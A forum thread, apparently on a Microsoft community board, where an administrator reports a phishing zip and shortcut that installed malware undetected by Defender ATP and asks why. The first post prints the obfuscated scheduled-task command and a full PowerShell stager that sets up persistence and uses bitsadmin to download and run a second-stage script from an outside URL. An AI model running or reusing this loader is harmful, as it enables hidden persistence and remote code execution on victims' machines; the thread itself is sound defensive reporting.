Forum Discussion
Malware not detected (but it should)
Some days ago a colleague has received an email (O365 ATP protected) and clicked the link inside.
- The link caused a zip file to be downloaded
- the zip contained2 files, a shortcut and a xml file
- the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"
- so a cmd was started and then a powershell command to parse the content of the zip file
- the zip file contained the string below (to install the malware)
Now the malware is correctly detected but a week ago it wasn't; the reason of concern is that Defender ATP SHOULD have detected a suspicious activity
- a zip was downloaded
- the lnk file when double-clicked created a task
- the task has launched a cmd, the cmd has launched a powershell and the powershell has gone through the file system to get the original zip and install the malware
I'm wondering why no suspicious activity was detected.
I also wonder why there is no a way to interact with MSFT support in such a case if you don't have a support plan; evidence is that i'm facing a product issue
The string contained at the end of the zip file:
$IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
- rstgermainCopper Contributor
pbaratta Yea this is somewhat concerning. I half replicated what you posted. Created a shortcut with the scheduled task command line and zipped it up. Uploaded to google drive, downloaded it then executed.
-explorer.exe
-- chrome.exe
--- WinRAR.exe
----schtasks.exe
Uhh yea that does not look legitimate
- pbarattaBrass Contributor
hopefully we'll have a feedback from Microsoft
- Raviv TamirMicrosoft
pbaratta thanks for reporting this. However, this is not a support forum. For a thorough response please open a support ticket (top right corner of the portal, under the '?' sign).
- pbarattaBrass Contributor
Raviv Tamiri know this is not a support forum, but i still think it's interesting (and important as well) discussing with the community of what happens in our environment. Don't you?